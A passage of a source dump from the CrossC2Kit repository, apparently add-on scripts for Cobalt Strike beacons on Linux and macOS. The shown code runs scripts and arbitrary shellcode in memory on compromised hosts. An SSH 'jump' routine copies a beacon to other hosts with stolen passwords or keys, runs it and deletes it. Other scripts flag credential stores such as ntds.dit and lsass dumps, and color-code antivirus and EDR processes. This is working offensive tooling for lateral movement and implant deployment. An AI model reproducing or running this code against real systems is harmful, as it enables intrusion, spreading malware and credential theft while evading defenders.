"\nUsage: bash [|] \n\tbash c:\\getsysteminfo.sh \n\tbash for i in `ls`;do echo \$i; done\n"); 52 | 53 | ssh_alias perl { 54 | $taskResType = "info"; # info -> normal message 55 | CrossC2MemScriptEng("perl", $taskResType, @_); 56 | } 57 | 58 | ssh_command_register("perl", "CrossC2 Perl Script - run script in memory", "\nUsage: perl [|] \n\tperl c:\\getsysteminfo.pl\n\tperl \$a = 'hello';print \$a\n"); 59 | 60 | ssh_alias ruby { 61 | $taskResType = "info"; # info -> normal message 62 | CrossC2MemScriptEng("ruby", $taskResType, @_); 63 | } 64 | 65 | ssh_command_register("ruby", "CrossC2 Ruby Script - run script in memory", "\nUsage: ruby [|] \n\truby c:\\getsysteminfo.rb\n\truby puts 'hello'\n"); 66 | 67 | 68 | ssh_alias php { 69 | $taskResType = "info"; # info -> normal message 70 | CrossC2MemScriptEng("php", $taskResType, @_); 71 | } 72 | 73 | ssh_command_register("php", "CrossC2 PHP Script - run script in memory", "\nUsage: php [|] \n\tphp c:\\getsysteminfo.php\n\tphp \n"); 74 | 75 | 76 | sub openRunScriptDialogCallBack { 77 | $scriptFile = $3['scriptFile']; 78 | $scriptContent = $3['scriptContent']; 79 | $scriptType = $3['scriptType']; 80 | $scriptArgs = $3['scriptArgs']; 81 | $taskResType = "info"; # info -> normal message 82 | 83 | if ($scriptFile ne $null) { 84 | @script_config = @($bid, $scriptFile); # script_config => @( bid, script_path, arg1, arg2, ... , argN ) 85 | @script_args = split(" ", $scriptArgs); 86 | foreach $index => $value (@script_args) { 87 | push(@script_config,$value); 88 | } 89 | CrossC2MemScriptEng($scriptType, $taskResType, @script_config); 90 | } else { 91 | @script_config = @($bid); # script_config => @( bid, script_content_split_with_space ) 92 | @script_args = split(" ", $scriptContent); 93 | foreach $index => $value (@script_args) { 94 | push(@script_config,$value); 95 | } 96 | CrossC2MemScriptEng($scriptType, $taskResType, @script_config); 97 | } 98 | } 99 | 100 | sub openRunScriptDialog { 101 | $bid = $1; 102 | $dialog = dialog("RunScriptInMemory", %(bid => $bid, scriptFile => "", scriptContent => "", scriptType => "", scriptArgs => ""), &openRunScriptDialogCallBack); 103 | dialog_description($dialog, "run script in memory"); 104 | 105 | drow_combobox($dialog, "scriptType", "scriptType: ", @("bash", "python", "zsh", "perl", "ruby", "php")); 106 | drow_file($dialog, "scriptFile", "scriptFile: "); 107 | drow_text($dialog, "scriptArgs", "run args: "); 108 | 109 | drow_text_big($dialog, "scriptContent", "or input Script Content:"); 110 | 111 | dbutton_action($dialog, "run"); 112 | dialog_show($dialog); 113 | } -------------------------------------------------------------------------------- /spawn/runshellcode.cna: -------------------------------------------------------------------------------- 1 | sub bshellcode{ 2 | $bid = $1; 3 | $shellcode = $2; 4 | $taskName = "cc2_spawn"; # taskName 5 | $taskType = "so"; # $taskType -> ELF, MachO, so, dylib 6 | $taskResType = "info"; # info -> normal message 7 | blog($bid, $shellcode); 8 | $transportArg = $shellcode."^"; 9 | 10 | $os = lc(beacon_info($bid, "os")); 11 | if ('linux' isin $os) { 12 | if ($arch eq 'x86') { 13 | $loadlib = "jobs/cc2_jobs32.so"; 14 | } else if ($arch eq 'x64') { 15 | $loadlib = "spawn/spawnas.so"; 16 | } 17 | } else if ('macos' isin $os) { 18 | $loadlib = "jobs/cc2_jobs.dylib"; 19 | } 20 | $loadlib = "spawn/spawnas.so"; 21 | 22 | if ($loadlib) { 23 | blog($bid, "run shellcode"); 24 | bcrossc2_load_dyn($bid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 25 | } else { 26 | berror($bid, "unsupport platform"); 27 | } 28 | 29 | } 30 | 31 | ssh_alias("cc2_shellcode", &bshellcode); 32 | 33 | ssh_command_register("cc2_shellcode", "CrossC2 Run shellcode", "\nUsage: cc2_shellcode \\x80\\x95\\x90....\\x90 "); 34 | 35 | sub openShellCodeDialogCallBack { 36 | $shellcode = $3['shellcode']; 37 | bshellcode($bid, $shellcode); 38 | } 39 | 40 | sub openShellCodeDialog { 41 | $bid = $1; 42 | $dialog = dialog("RunShellCode", %(bid => $bid, shellcode => "\\x90\\x90\\x90\\x90"), &openShellCodeDialogCallBack); 43 | dialog_description($dialog, "run shellcode"); 44 | 45 | drow_text_big($dialog, "shellcode", "shellcode: "); 46 | 47 | dbutton_action($dialog, "run"); 48 | dialog_show($dialog); 49 | } 50 | 51 | sub cc2_shellcode_status { 52 | local('$bid $os $arch $system'); 53 | $bid = $1; 54 | $os = lc(beacon_info($bid, "os")); 55 | $arch = beacon_info($bid, "arch"); 56 | if ('macos' isin $os) { 57 | return 'MacOS(intel)'; 58 | } else if ('linux' isin $os) { 59 | if ($arch eq 'x86') { 60 | return 'Linux32'; 61 | } else if ($arch eq 'x64') { 62 | return 'Linux64'; 63 | } 64 | } 65 | return ''; 66 | } -------------------------------------------------------------------------------- /spawn/runshellcode.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/spawn/runshellcode.dylib -------------------------------------------------------------------------------- /spawn/runshellcode.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/spawn/runshellcode.so -------------------------------------------------------------------------------- /spawn/runshellcode32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/spawn/runshellcode32.so -------------------------------------------------------------------------------- /sshpass/sshpass.cna: -------------------------------------------------------------------------------- 1 | sub bssh_pass { 2 | local('$bid $username $password $privatekey $passtype $host $ObjectPath $taskName $taskType $taskResType'); 3 | local('$upload_beacon_line $transArray $upload_beacon $cmd $trans $run_beacon $bd $os $arch $loadlib'); 4 | $bid = $1; 5 | $username = $2; 6 | $password = $3; 7 | $privatekey = $4; 8 | $passtype = $5; 9 | $host = $6; 10 | $ObjectPath = $7; 11 | 12 | $taskName = "cc2_sshpass"; 13 | $taskType = "ELF"; 14 | $taskResType = "info"; 15 | 16 | # upload beacon 17 | $upload_beacon_line = "python -p ".$password." scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no ".$ObjectPath.' '.$username."@".$host.":".$ObjectPath; 18 | $transArray = split(" ", ["$upload_beacon_line" trim]); 19 | $upload_beacon = transportArgs(0, $transArray); 20 | 21 | $transArray = $null; 22 | 23 | # run beacon 24 | $cmd = 'chmod 755 '.$ObjectPath.';'.$ObjectPath.';sleep 10;rm -rf '.$ObjectPath; 25 | $trans = "python -p ".$password." ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no ".$username."@".$host; 26 | $transArray = split(" ", ["$trans" trim]); 27 | add($transArray, $cmd, -1); 28 | $run_beacon = transportArgs(0, $transArray); 29 | 30 | $bd = bdata($bid); 31 | $os = lc(beacon_info($bid, "os")); 32 | $arch = beacon_info($bid, "arch"); 33 | $loadlib = $null; 34 | btask($bid, "RUN: cc2_sshpass"); 35 | 36 | if ('linux' isin $os) { 37 | if ($arch eq 'x86') { 38 | $loadlib = 'sshpass/sshpass32'; 39 | } else if ($arch eq 'x64') { 40 | $loadlib = 'sshpass/sshpass64'; 41 | } 42 | } else if ('macos' isin $os) { 43 | $loadlib = 'sshpass/sshpass'; 44 | } 45 | 46 | if ($host && $username && (($password ne "") || ($privatekey ne "")) && $loadlib) { 47 | btask($bid, 'ssh pass -> '.$username.'@'.$host); 48 | btask($bid, 'upload beacon to '.$username.'@'.$host); 49 | bcrossc2_load_dyn_pro($bid, $taskType, $taskName, $taskResType, 'Y', 'N', 11, $loadlib, $upload_beacon); 50 | btask($bid, 'run beacon on '.$username.'@'.$host); 51 | bcrossc2_load_dyn_pro($bid, $taskType, $taskName, $taskResType, 'Y', 'N', 11, $loadlib, $run_beacon); 52 | bshell($bid, 'sleep 5&&rm -rf '.$ObjectPath); 53 | } 54 | } 55 | 56 | sub bssh_jump_cb { 57 | # @($username, $password, $privatekey, $passtype, $hostArray, $cmd) 58 | $bid = $1; 59 | $username = $2[0]; 60 | $password = $2[1]; 61 | $privatekey = $2[2]; 62 | $passtype = $2[3]; 63 | $hostArray = $2[4]; 64 | $cmd = $2[5]; 65 | 66 | foreach $index => $value ($targetArray) { 67 | bssh_pass($bid, $username, $password, $privatekey, $passtype, $value, $cmd); 68 | } 69 | } 70 | 71 | sub bssh_jump { 72 | # bssh_jump($bid, $username, $password, $privatekey, $passtype, $listener, $targetArray, $workpath); 73 | $bid = $1; 74 | $username = $2; 75 | $password = $3; 76 | $privatekey = $4; 77 | $passtype = $5; 78 | $listener = $6; 79 | $hostArray = $7; 80 | 81 | $savepath = $8; 82 | $savename = random_string(8); 83 | if ($savepath eq '') { 84 | $savepath = '/tmp/'; 85 | } 86 | $ObjectPath = $savepath.'/'.$savename; 87 | 88 | 89 | btask($bid, "[bssh_jump]: ------ sshpass ------"); 90 | $beaconData = getCrossC2Beacon($listener, "main"); 91 | if (strlen($beaconData) > 0) { 92 | bawait_upload_raw($bid, $beaconData, $savepath, $savename, &bssh_jump_cb, @($username, $password, $privatekey, $passtype, $hostArray, $ObjectPath)); 93 | } else { 94 | berror($bid, "[bssh_jump]: maybe no beacondata in CrossC2Listener: $listener"); 95 | } 96 | } 97 | # reverse_https -> scp upload & ssh run 98 | # bind_tcp -> althttpd -> ssh ? 99 | 100 | 101 | sub jumpSSHdialogCallBack { 102 | $targetLines = $3['targetLines']; 103 | $username = $3['username']; 104 | $password = $3['password']; 105 | $privatekey = $3['privatekey']; 106 | $passtype = $3['passtype']; 107 | $listener = $3['listener']; 108 | $session = $3['session']; 109 | $bid = $null; 110 | $workspace = $3['workspace']; 111 | 112 | if ($listener && $session) { 113 | # get bid with select session 114 | foreach $beacon (beacons()) { 115 | ($internal, $computer) = values($beacon, @('internal', 'computer')); 116 | $tempMenuBar = $internal."@".$computer; 117 | if (!-isactive $beacon['id']) { 118 | } else if ((-isssh $beacon['id']) && ($tempMenuBar eq $session)) { 119 | $bid = $beacon['id']; 120 | } 121 | } 122 | 123 | if ($bid) { 124 | $targetLines = replace($targetLines, '\[', ""); 125 | $targetLines = replace($targetLines, '\]', ""); 126 | $targetArray = split(", ", ["$targetLines" trim]); 127 | 128 | bssh_jump($bid, $username, $password, $privatekey, $passtype, $listener, $targetArray, $workspace); 129 | } 130 | } 131 | } 132 | 133 | sub jumpSSHdialog { 134 | %beaconListenerMap = getCrossC2Listener(); 135 | @beaconListenerMenu = @(); 136 | foreach $key => $value (%beaconListenerMap) { 137 | add(@beaconListenerMenu, $value[0]); 138 | } 139 | 140 | @sessionMenu = @(); 141 | %sessionMap = getSSHSession(); 142 | foreach $key => $value (%sessionMap) { 143 | add(@sessionMenu, $value[0]); 144 | } 145 | 146 | 147 | $targetArray = $2; 148 | $dialog = dialog("CrossC2 SSH Jump", %(username => "root", password => "", privatekey => "", $listener => $null, $session => $null, targetLines => $targetArray, passtype => $1, workspace => "/tmp/"), &jumpSSHdialogCallBack); 149 | drow_text($dialog, "username", "login username: ", 20); 150 | if ($1 eq "ssh") { 151 | drow_text($dialog, "password", "login password: ", 20); 152 | } else if ($1 eq "ssh-key") { 153 | drow_text($dialog, "privatekey", "login privatekey: ", 20); 154 | } 155 | drow_combobox($dialog, "listener", "CrossC2 Listener: ", @beaconListenerMenu); 156 | drow_combobox($dialog, "session", "Session: ", @sessionMenu); 157 | drow_text($dialog, "workspace", "workspace: ", 20); 158 | 159 | dbutton_action($dialog, "Jump"); 160 | dialog_show($dialog); 161 | } 162 | 163 | popup targets { 164 | separator(); 165 | menu "&CC2—Jump" { 166 | menu "&sshpass" { 167 | item "ssh" { 168 | jumpSSHdialog("ssh", $1); 169 | } 170 | item "ssh-key" { 171 | jumpSSHdialog("ssh-key", $1); 172 | } 173 | } 174 | } 175 | } -------------------------------------------------------------------------------- /sshpass/sshpass64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/sshpass/sshpass64 -------------------------------------------------------------------------------- /third-party/readme.md: -------------------------------------------------------------------------------- 1 | # 插件提交方式 2 | 3 | 4 | 1. git clone https://github.com/CrossC2/CrossC2Kit.git 5 | 2. cd CrossC2Kit && mkdir third-party 6 | 3. 将插件置入该目录后进行 pull request 7 | 4. pull request 项目将在自动编译通过后进行合并 8 | 9 | 10 | ```c 11 | ├── third-party 12 | │   ├── test.cna 13 | │   └── util 14 | │ ├── lpe // 插件分类 15 | │ │ ├── cve-2021-1102 // 插件名称 16 | │ │ │ ├── load.cna // 插件启动入口 * 17 | │ │ │ ├── readme.md // 插件文档 18 | │ │ │ ├── src // 插件包含的二进制组件源码目录 19 | │ │ │ │ ├── exp.c // 待编译的源码 * 20 | │ │ │ │ └── makefile // 自动编译的工程配置文件 * 21 | │ │ │ └── testa.cna // 插件内部用到的cna脚本 22 | │ │ └── cve-2022-2202 23 | │   │   ├── load.cna 24 | │   │   ├── readme.md 25 | │   │   └── src 26 | │   │   ├── exp.c 27 | │   │   └── makefile 28 | │   └── pass 29 | │   ├── linux-login 30 | │   │   ├── load.cna 31 | │   │   └── src 32 | │   │   ├── exp.c 33 | │   │   └── makefile 34 | │   └── readme.md 35 | ``` 36 | 37 | 5. 编译结果将在 **summary** 中显示,包含`系统架构信息`、`编译过程`、`编译结果符号信息`、`Linux包含GLIBC版本信息`、`编译整体结果` 38 | -------------------------------------------------------------------------------- /update_site/SSLUtils.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/update_site/SSLUtils.jar -------------------------------------------------------------------------------- /update_site/httprequest.cna: -------------------------------------------------------------------------------- 1 | # 2 | # Safe & sound HTTP request implementation for Cobalt Strike 4.0 Aggressor Script. 3 | # Works with HTTP & HTTPS, GET/POST/etc. + redirections. 4 | # 5 | # Mariusz B. / mgeeky 6 | # 7 | 8 | __CC2_INIT__:import SSLUtils from: __CC2_INIT_PATH__/update_site/SSLUtils.jar; 9 | 10 | import java.net.URLEncoder; 11 | import java.io.BufferedReader; 12 | import java.io.DataOutputStream; 13 | import java.io.InputStreamReader; 14 | import java.net.HttpURLConnection; 15 | import java.net.URL; 16 | 17 | 18 | # 19 | # httpRequest($method, $url, $body); 20 | # 21 | sub httpRequest { 22 | $method = $1; 23 | $url = $2; 24 | $body = $3; 25 | $n = 0; 26 | # println("request ".$url); 27 | 28 | if(size(@_) == 4) { $n = $4; } 29 | 30 | $bodyLen = strlen($body); 31 | $maxRedirectsAllowed = 10; 32 | if ($n > $maxRedirectsAllowed) { 33 | warn("Exceeded maximum number of redirects: $method $url "); 34 | return ""; 35 | } 36 | 37 | try 38 | { 39 | $urlobj = [new java.net.URL: $url]; 40 | $con = $null; 41 | $SSL = [new SSLUtils]; 42 | [$SSL ignoreSsl]; 43 | $con = [$urlobj openConnection]; 44 | [$con setRequestMethod: $method]; 45 | [$con setInstanceFollowRedirects: true]; 46 | [$con setRequestProperty: "Accept", "*/*"]; 47 | [$con setRequestProperty: "Cache-Control", "max-age=0"]; 48 | [$con setRequestProperty: "Connection", "keep-alive"]; 49 | # [$con setRequestProperty: "User-Agent", $USER_AGENT]; 50 | [$con setRequestProperty: "User-Agent", "bot"]; 51 | [$con setConnectTimeout: 3000]; 52 | [$con setReadTimeout: 3000]; 53 | 54 | if($bodyLen > 0) { 55 | [$con setDoOutput: true]; 56 | [$con setRequestProperty: "Content-Type", "application/x-www-form-urlencoded"]; 57 | } 58 | 59 | $outstream = [$con getOutputStream]; 60 | if($bodyLen > 0) { 61 | [$outstream write: [$body getBytes]]; 62 | } 63 | 64 | $inputstream = [$con getInputStream]; 65 | $handle = [SleepUtils getIOHandle: $inputstream, $outstream]; 66 | $responseCode = [$con getResponseCode]; 67 | 68 | if(($responseCode >= 301) && ($responseCode <= 304)) { 69 | $loc = [$con getHeaderField: "Location"]; 70 | return httpRequest($method, $loc, $body, $n + 1); 71 | } 72 | 73 | @content = readAll($handle); 74 | $response = ""; 75 | foreach $line (@content) { 76 | $response .= $line . "\r\n"; 77 | } 78 | 79 | if((strlen($response) > 2) && (right($response, 2) eq "\r\n")) { 80 | $response = substr($response, 0, strlen($response) - 2); 81 | } 82 | 83 | return $response; 84 | } 85 | catch $message 86 | { 87 | warn("HTTP Request failed: $method $url : $message "); 88 | printAll(getStackTrace()); 89 | return ""; 90 | } 91 | } -------------------------------------------------------------------------------- /update_site/update_site.cna: -------------------------------------------------------------------------------- 1 | include(script_resource("update_site/httprequest.cna")); 2 | popup generator { 3 | separator(); 4 | item "&Update Script" { 5 | createScriptEditor(); 6 | } 7 | } 8 | 9 | 10 | 11 | sub getScript { 12 | local('%script_site'); 13 | local('$Description, $Proto, $Host, $Port, $URI'); 14 | %script_site = %(); 15 | $script_count = 0; 16 | foreach $site_list(sites()) { 17 | ($Description, $Proto, $Host, $Port, $URI) = values($site_list, @('Description', 'Proto', 'Host', 'Port', 'URI')); 18 | if ("Script" isin $Description) { 19 | $scriptURL = $Proto.$Host.':'.$Port.$URI; 20 | %script_site[$script_count] = @($scriptURL); 21 | $script_count += 1; 22 | } 23 | } 24 | return %script_site; 25 | } 26 | 27 | sub getScriptDesc { 28 | local('$site_url $desc'); 29 | local('$Description, $Proto, $Host, $Port, $URI'); 30 | $site_url = $1; 31 | $desc = ''; 32 | foreach $site_list(sites()) { 33 | ($Description, $Proto, $Host, $Port, $URI) = values($site_list, @('Description', 'Proto', 'Host', 'Port', 'URI')); 34 | if ("Script" isin $Description) { 35 | $scriptURL = $Proto.$Host.':'.$Port.$URI; 36 | if ($scriptURL eq $site_url) { 37 | $desc = $Description; 38 | } 39 | } 40 | } 41 | return $desc; 42 | } 43 | 44 | sub updateScriptCallback { 45 | local('$action_type $scheme $host $port $uri $script_content $desc'); 46 | $action_type = $2; 47 | if ($action_type eq "UPDATE !") { 48 | $scheme = $3['scheme']; 49 | $host = $3['host']; 50 | $port = $3['port']; 51 | $uri = $3['uri']; 52 | $script_content = $3['script_content']; 53 | $desc = $3['desc']; 54 | if ($scheme eq 'http') { 55 | site_kill($port, '/'.$uri); 56 | site_host($host, $port, '/'.$uri, $script_content, 'automatic', $desc, false); 57 | } else if ($scheme eq 'https') { 58 | site_kill($port, '/'.$uri); 59 | site_host($host, $port, '/'.$uri, $script_content, 'automatic', $desc, true); 60 | } 61 | } 62 | } 63 | 64 | sub createScriptEditorCallback { 65 | local('$action_type $script_url $scheme $host $port $uri $desc $host_and_port $host_and_uri $script_content'); 66 | $action_type = $2; 67 | println($action_type); 68 | if ($action_type eq "edit") { 69 | $script_url = $3['script_url']; 70 | if ($script_url) { 71 | $script_content = httpRequest("GET", $script_url, ""); 72 | println($script_content); 73 | if ($script_content) { 74 | $desc = getScriptDesc($script_url); 75 | $host = ''; 76 | $port = ''; 77 | ($scheme, $host_and_uri) = split('://', $script_url); 78 | ($host_and_port, $uri) = split('/', $host_and_uri); 79 | if (':' isin $host_and_port) { 80 | ($host, $port) = split(':', $host_and_port); 81 | } 82 | if ($scheme && $host && $port && $uri && $desc) { 83 | $dialog = dialog("Edit Script Content", %(scheme => $scheme, host => $host, port => $port, uri => $uri, desc => $desc, script_content => $script_content), &updateScriptCallback); 84 | dialog_description($dialog, "script editor"); 85 | drow_text($dialog, "scheme", "scheme: "); 86 | drow_text($dialog, "host", "host: "); 87 | drow_text($dialog, "port", "port: "); 88 | drow_text($dialog, "uri", "uri: "); 89 | drow_text($dialog, "desc", "desc: "); 90 | drow_text_big($dialog, "script_content", "Script Content: "); 91 | dbutton_action($dialog, "UPDATE !"); 92 | dbutton_action($dialog, "cancel"); 93 | dialog_show($dialog); 94 | } 95 | } 96 | } 97 | } 98 | } 99 | 100 | sub createScriptEditor { 101 | local('@scriptMenu %scriptMap'); 102 | @scriptMenu = @(); 103 | 104 | %scriptMap = getScript(); 105 | foreach $key => $value (%scriptMap) { 106 | add(@scriptMenu, $value[0]); 107 | } 108 | 109 | $dialog = dialog("Edit script", %(script_url => "", scriptMap => %scriptMap), &createScriptEditorCallback); 110 | dialog_description($dialog, "script editor"); 111 | drow_combobox($dialog, "script_url", "CrossC2 Script: ", @scriptMenu); 112 | dbutton_action($dialog, "edit"); 113 | dbutton_action($dialog, "cancel"); 114 | dialog_show($dialog); 115 | } 116 | -------------------------------------------------------------------------------- /utils/cc2FilesColor.cna: -------------------------------------------------------------------------------- 1 | # 2 | # Color Coded Files Listing for CrossC2. 3 | # 4 | # A nice script that colorizes your `ls` output and keeps track of uploaded files 5 | # to let you highlight them. 6 | # 7 | # Be wary of additional performance hit when listing big directories imposed by 8 | # their listing processing, coloring and sorting that this script does. 9 | # 10 | # Based on the original FilesColor.cna by @mgeeky. (https://github.com/mgeeky/cobalt-arsenal/blob/master/FilesColor.cna) 11 | # 12 | # Author: 13 | # hooooooooooook 14 | # (https://github.com/gloxec/CrossC2) 15 | # 16 | 17 | 18 | global('@UPLOADED_FILE_NAMES $TIMES_TO_DISPLAY_COLORS_SCHEME $MAX_OUTPUT_SIZE_TO_COLORIZE'); 19 | 20 | @UPLOADED_FILE_NAMES = @(); 21 | $TIMES_TO_DISPLAY_COLORS_SCHEME = 3; 22 | 23 | # If files listing output is going to be longer than the below threshold, avoid processing 24 | # that output to return results faster 25 | $MAX_OUTPUT_SIZE_TO_COLORIZE = 65536; 26 | 27 | sub interpretSize { 28 | local('$s $size'); 29 | $s = 0L; 30 | $s = long($1); 31 | 32 | if($s == 0) { 33 | $size = ""; 34 | } 35 | else if($s < 1024L) { 36 | $size .= long($s) . "B"; 37 | } 38 | else if($s < long(1024L * 1024L)) { 39 | $size = long(round($s / 1024.0, 1)); 40 | $size .= "KB"; 41 | } 42 | else if($s < long(1024L * 1024L * 1024L)) { 43 | $size = long(round(($s / 1024.0) / 1024, 1)); 44 | $size .= "MB"; 45 | } 46 | else if($s < long(1024L * 1024L * 1024L * 1024L)) { 47 | $size = long(round((($s / 1024.0) / 1024) / 1024, 1)); 48 | $size .= "GB"; 49 | } 50 | 51 | return $size; 52 | } 53 | 54 | sub format_ls{ 55 | # $1 = beacon ID, $2 = the folder, $3 = results 56 | $bid = $1; 57 | $res = $3; 58 | blog($bid, "format ls: ".$2); 59 | local('$totalsize @subl $outls $temp $size $s $ext $dotpos $type $lastmod $name @lines @ls'); 60 | this('$once'); 61 | 62 | if(strlen($res) > $MAX_OUTPUT_SIZE_TO_COLORIZE) { 63 | return $res; 64 | } 65 | 66 | @lines = split("\n", ["$res" trim]); 67 | 68 | @configuration = @('config', 'conf', 'json', 'yml', 'xml', 'inf', 'properties', 'settings'); 69 | @sensitive = @('ost', 'dmp', 'sqlite', 'sqlite3', 'db', 'kdbx', 'kdb', 'dit', 'kirbi', 'ccache', 'kirbis', 'git'); 70 | @sensitive_files = @('ntds.dit', 'lsass.dmp', 'sam', 'system', 'security'); 71 | @archives = @('rar', 'zip', '7z', 'tar', 'gz', 'bz2', 'iso'); 72 | @exes = @('msi', 'sys', 'exe', 'dll', 'bat', 'sct', 'so', 'sh'); 73 | @docs = @('csv', 'odt', 'dotx', 'dotm', 'docm', 'xlam', 'xll', 'xlm', 'xlsm', 'xltx', 'msg', 'rtf', 'txt', 'pdf', 'docx', 'doc', 'xls', 'xlsx', 'ppt', 'pptx', 'pptm', 'odp', 'ppsm', 'ppa', 'ppam'); 74 | @sources = @('cpp', 'md', 'h', 'hpp', 'c', 'pl', 'sql', 'php', 'py', 'java', 'rb', 75 | 'html', 'js', 'css', 'asp', 'aspx', 'cs', 'vbs', 'vbe', 'jse', 'ps1', 'sln', 'vcxproj', 'csproj', 'gitignore', 'gitmodules', 'gitattributes'); 76 | 77 | 78 | if($once < $TIMES_TO_DISPLAY_COLORS_SCHEME) { 79 | $outls .= "\cC[*]\o Colors scheme:\n"; 80 | $outls .= "\cC[*]\o ---------------------------\n"; 81 | $outls .= "\cC[*]\o Directories: \c8 YELLOW \o\n"; 82 | $outls .= "\cC[*]\o Cobalt Strike Uploaded Files: \cBBLUE\o\n"; 83 | $outls .= "\cC[*]\o Sensitive files: \c4 RED \o\n"; 84 | $outls .= "\cC[*]\o Configuration files: \c3 DARK GREEN \o\n"; 85 | $outls .= "\cC[*]\o Archives: \c7 ORANGE \o\n"; 86 | $outls .= "\cC[*]\o Source codes: \cC DARK BLUE \o\n"; 87 | $outls .= "\cC[*]\o Executables: \cD MAGENTA \o\n"; 88 | $outls .= "\cC[*]\o Documents: \c9 GREEN \o\n"; 89 | $once += 1; 90 | } 91 | 92 | $outls .= "\c9[+]\o Location: \cC" . @lines[0] . "\o\n\n"; 93 | $outls .= " Size Type Last Modified Name\n"; 94 | $outls .= " ---- ---- ------------------- ----\n"; 95 | 96 | @subl = sublist(@lines, 1); 97 | $totalsize = 0L; 98 | 99 | foreach $temp (@subl) { 100 | ($type, $s, $lastmod, $name) = split("\t", $temp); 101 | 102 | if ($name eq "." || $name eq "..") { 103 | continue; 104 | } 105 | 106 | if($type eq "D") { $type = "dir"; } 107 | else if($type eq "F") { $type = "file"; } 108 | 109 | $s = long($s); 110 | $totalsize += $s; 111 | 112 | $size = interpretSize($s); 113 | $dotpos = lindexOf($name, '.'); 114 | $ext = ""; 115 | if(($dotpos) ) { 116 | $ext = lc(substr($name, $dotpos + 1)); 117 | } 118 | 119 | if($type eq "dir") { 120 | # Directories in YELLOW 121 | push(@ls, %(type => $type, name => $name, entry => "\c8 $[10]size $[7]type\o $[21]lastmod\c8 $name \o")); 122 | } 123 | else if($name in @UPLOADED_FILE_NAMES) { 124 | # Uploaded Files through Cobalt Strike (the ones we still keep track off) in Blue 125 | push(@ls, %(type => $type, name => $name, entry => "\cB $[10]size $[7]type\o $[21]lastmod\cB $name $+ \o")); 126 | } 127 | else if(($ext in @sensitive) || (lc($name) in @sensitive_files)) { 128 | # Sensitive files in Red 129 | push(@ls, %(type => $type, name => $name, entry => "\c4 $[10]size $[7]type\o $[21]lastmod\c4 $name \o")); 130 | } 131 | else if($ext in @exes) { 132 | # Executables in Magenta 133 | push(@ls, %(type => $type, name => $name, entry => "\cD $[10]size $[7]type\o $[21]lastmod\cD $name \o")); 134 | } 135 | else if($ext in @interesting) { 136 | # Configuration files in Dark Green 137 | push(@ls, %(type => $type, name => $name, entry => "\c3 $[10]size $[7]type\o $[21]lastmod\c3 $name \o")); 138 | } 139 | else if($ext in @sources) { 140 | # Source codes in Dark Blue 141 | push(@ls, %(type => $type, name => $name, entry => "\cC $[10]size $[7]type\o $[21]lastmod\cC $name \o")); 142 | } 143 | else if($ext in @archives) { 144 | # Archives in Orange 145 | push(@ls, %(type => $type, name => $name, entry => "\c7 $[10]size $[7]type\o $[21]lastmod\c7 $name \o")); 146 | } 147 | else if($ext in @docs) { 148 | # Documents in Green 149 | push(@ls, %(type => $type, name => $name, entry => "\c9 $[10]size $[7]type\o $[21]lastmod\c9 $name \o")); 150 | } 151 | else { 152 | push(@ls, %(type => $type, name => $name, entry => " $[10]size $[7]type $[21]lastmod $name \o")); 153 | } 154 | } 155 | 156 | sort({ return ($1['type'] cmp $2['type']); }, @ls); 157 | 158 | foreach $temp (@ls) { 159 | $outls .= $temp['entry'] . "\n"; 160 | } 161 | 162 | $totalsize = interpretSize($totalsize); 163 | $outls .= "\nFiles and dirs count: " . size(@ls) . ", total size of files: $totalsize (output len: " . strlen($res) . ")\n"; 164 | blog($bid, $outls); 165 | } 166 | 167 | 168 | ssh_alias ls { 169 | if(!$2){ 170 | bls($1, "./", &format_ls); 171 | } else { 172 | bls($1, $2, &format_ls); 173 | } 174 | } -------------------------------------------------------------------------------- /utils/cc2ProcessColor.cna: -------------------------------------------------------------------------------- 1 | 2 | # Color Coded Process Listing for CrossC2. 3 | # 4 | # Takes the PS output in CS and color codes all AV processes, explorer process, browsers processes, and current process running 5 | # 6 | # Based on the original ProcessColor.cna by @r3dQu1nn. (https://github.com/harleyQu1nn/AggressorScripts/blob/master/ProcessColor.cna) 7 | # 8 | # Author: 9 | # hooooooooooook 10 | # (https://github.com/gloxec/CrossC2) 11 | # 12 | 13 | global('@av @av1 @edr @admin @login @browsers'); 14 | #av 1 15 | @av = @("SecurityHealthService", "Tanium", "360RP", "360SD", "360Safe", "360leakfixer", "360rp", "360safe", "360sd", "360tray", "AAWTray", "ACAAS", "ACAEGMgr", "ACAIS", "AClntUsr", "ALERT", "ALERTSVC", "ALMon", "ALUNotify", "ALUpdate", "ALsvc", "AVENGINE", "AVGCHSVX", "AVGCSRVX", "AVGIDSAgent", "AVGIDSMonitor", "AVGIDSUI", "AVGIDSWatcher", "AVGNSX", "AVKProxy", "AVKService", "AVKTray", "AVKWCtl", "AVP", "AVP", "AVPDTAgt", "AcctMgr", "Ad-Aware", "Ad-Aware2007", "AddressExport", "AdminServer", "Administrator", "AeXAgentUIHost", "AeXNSAgent", "AeXNSRcvSvc", "AlertSvc", "AlogServ", "AluSchedulerSvc", "AnVir", "AppSvc32", "AtrsHost", "Auth8021x", "AvastSvc", "AvastUI", "Avconsol", "AvpM", "Avsynmgr", "Avtask", "BLACKD", "BWMeterConSvc", "CAAntiSpyware", "CALogDump", "CAPPActiveProtection", "CAPPActiveProtection", "CB", "CCAP", "CCenter", "CClaw", "CLPS", "CLPSLA", "CLPSLS", "CNTAoSMgr", "CPntSrv", "CTDataLoad", "CertificationManagerServiceNT", "ClShield", "ClamTray", "ClamWin", "Console", "CylanceUI", "DAO_Log", "DLService", "DLTray", "DLTray", "DRWAGNTD", "DRWAGNUI", "DRWEB32W", "DRWEBSCD", "DRWEBUPW", "DRWINST", "DSMain", "DWHWizrd", "DefWatch", "DolphinCharge", "EHttpSrv", "EMET_Agent", 